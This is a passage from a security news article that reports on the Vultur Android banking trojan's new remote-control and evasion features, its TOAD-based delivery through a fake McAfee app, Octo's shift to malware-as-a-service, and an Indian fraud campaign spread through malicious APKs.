and detection evasion techniques, enabling its operators to remotely interact
with a mobile device and harvest sensitive data.
"Vultur has also started masquerading more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and using the guise of legitimate applications to carry out its malicious actions," NCC Group researcher Joshua Kamp said in a report published last week.
Vultur was first disclosed in early 2021, with the malware capable of leveraging Android's accessibility services APIs to execute its malicious actions.
The malware has been observed to be distributed via trojanized dropper apps on the Google Play Store, masquerading as authenticator and productivity apps to trick unwitting users into installing them. These dropper apps are offered as part of a dropper-as-a-service (DaaS) operation called Brunhilda.
Other attack chains, as observed by NCC Group, involve the droppers being spread using a combination of SMS messages and phone calls – a technique called telephone-oriented attack delivery (TOAD) – to ultimately serve an updated version of the malware.
"The first SMS message guides the victim to a phone call," Kamp said. When the victim calls the number, the fraudster provides the victim with a second SMS that includes the link to the dropper: a modified version of the [legitimate] McAfee Security app."
The initial SMS message aims to induce a false sense of urgency by instructing the recipients to call a number to authorize a non-existent transaction that involves a large sum of money.
Upon installation, the malicious dropper executes three related payloads (two APKs and one DEX file) that register the bot with the C2 server, obtain accessibility services permissions for remote access via AlphaVNC and ngrok, and run commands fetched from the C2 server.
One of the prominent additions to Vultur is the ability to remotely interact with the infected device, including carrying out clicks, scrolls, and swipes, through Android's accessibility services, as well as download, upload, delete, install, and find files.
In addition, the malware is equipped to prevent the victims from interacting with a predefined list of apps, display custom notifications in the status bar, and even disable Keyguard to bypass lock screen security measures.
"Vultur's recent developments have shown a shift in focus towards maximizing
remote control over infected devices," Kamp said.
"With the capability to issue commands for scrolling, swipe gestures, clicks, volume control, blocking apps from running, and even incorporating file manager functionality, it is clear that the primary objective is to gain total control over compromised devices."
The development comes as Team Cymru revealed the Octo (aka Coper) Android banking trojan's transition to a malware-as-a-service operation, offering its services to other threat actors for conducting information theft.
"The malware offers a variety of advanced features, including keylogging, interception of SMS messages and push notifications, and control over the device's screen," the company said.
"It employs various injects to steal sensitive information, such as passwords and login credentials, by displaying fake screens or overlays. Additionally, it utilizes VNC (Virtual Network Computing) for remote access to devices, enhancing its surveillance capabilities."
Octo campaigns are estimated to have compromised 45,000 devices, primarily spanning Portugal, Spain, Turkey, and the U.S. Some of the other victims are located in France, the Netherlands, Canada, India, and Japan.
The findings also follow the emergence of a new campaign targeting Android users in India that distributes malicious APK packages posing as online booking, billing, and courier services via a malware-as-a-service (MaaS) offering.
The malware "targets theft of banking information, SMS messages, and other confidential information from victims' devices," Broadcom-owned Symantec said in a bulletin.
McAfee Labs, which shed more light on the ongoing campaign, said the malware has been embedded in over 800 apps. More than 3,700 Android devices have been compromised. It attributed the MaaS service to an Indian cyber group named Elvia Infotech.
"[Scammers] typically contact victims via phone, text, email, or social applications to inform them that they need to reschedule services," security researchers ZePeng Chen and Wenfeng Yu said.
"This kind of fraud attack is a typical and effective fraud method. As a result, victims are asked to download a specific app, and submit personal information. Once this information falls into the hands of scammers, they can easily steal funds from the victim’s bank account."